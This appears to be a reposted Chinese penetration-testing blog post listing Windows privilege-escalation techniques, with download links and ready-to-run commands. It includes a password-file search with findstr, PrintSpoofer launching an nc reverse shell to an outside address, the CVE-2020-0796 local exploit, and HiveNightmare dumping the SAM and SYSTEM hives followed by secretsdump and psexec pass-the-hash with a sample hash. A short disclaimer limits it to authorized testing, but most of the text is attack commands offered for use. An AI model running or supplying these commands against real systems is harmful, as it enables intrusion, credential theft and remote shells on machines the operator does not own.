0x01 阅读须知
鸡哥安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 漏洞复现
1.提权辅助工具winpeas.exe,以下为使用方法
1.下载地址:https://github.com/carlospolop/PEASS-ng2.WinPEAS.exe 的目标是在 Windows 环境中搜索可能的权限提升路径,需要目标系统(.Net >= 4.5.2)环境,支持打印输出颜色。3.使用方法:①winPEASany.exe log=result.txt //检查所有并打印②使用自带notepad打开result.txt并改为ANSI编码 //不然中文会显示乱码③type result即可
2.windows查找文件内容有 password 的文件:
findstr /si password *.txt *.xml *.docx *.ini
3.PrintSpoofer提权
1.下载地址https://github.com/itm4n/PrintSpoofer2.影响版本Windows 10和Windows Service 2016/20193.提权命令PrintSpoofer64.exe -i -c cmd或者通过nc进行反弹shellPrintSpoofer.exe -c "C:TOOLSnc.exe 10.10.13.37 1337 -e cmd"nc.exe -l -p 1337
4.CVE-2020-0796提权
1.下载地址https://github.com/danigargu/CVE-2020-0796/releases/tag/v1.02.影响版本Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows 10 Version 1909 for x64-based SystemsWindows Server, version 1903 (Server Core installation)Windows Server, version 1909 (Server Core installation)3.提权命令,即可得到system权限cve-2020-0796-local.exe
5.CVE-2021-36934提权
1.下载地址https://github.com/GossiTheDog/HiveNightmare/releases/download/0.5/HiveNightmare.exe 作者:东塔网络安全 https://www.bilibili.com/read/cv12586737 出处:bilibili2.影响版本Windows 10和Windows Service 2016/2019以及输入icacls c:windowssystem32configsam命令显示为BUILTINUsers:(I)(RX)的3.提权命令①.HiveNightmare.exe //导出SAM-haxx以及SYSTEM-haxx和SECURITY-haxx三个文件②.python3 secretsdump.py -sam SAM-2022-09-15 -system SYSTEM-2022-09-15 -security SECURITY-2022-09-15 LOCAL //生成hash值③.python3 psexec.py -hashes aad3b435b51404ee2ad3b435b51404ee:b4f38c38404c022912ffc78fa90bc681 xx@192.168.1.8 cmd.exe //连接即可④.虚拟机则需要如下步骤才可导出SAM:右键点击此电脑-》属性-》系统保护-》配置-》启用系统保护-》创建”设置一个test还原点
1个
1朵
5毛钱
天天搬砖的小M
能不能吃顿好的
就看你们的啦
原文始发于微信公众号(鸡哥的内网渗透之路):内网渗透 常用windows提权方法1
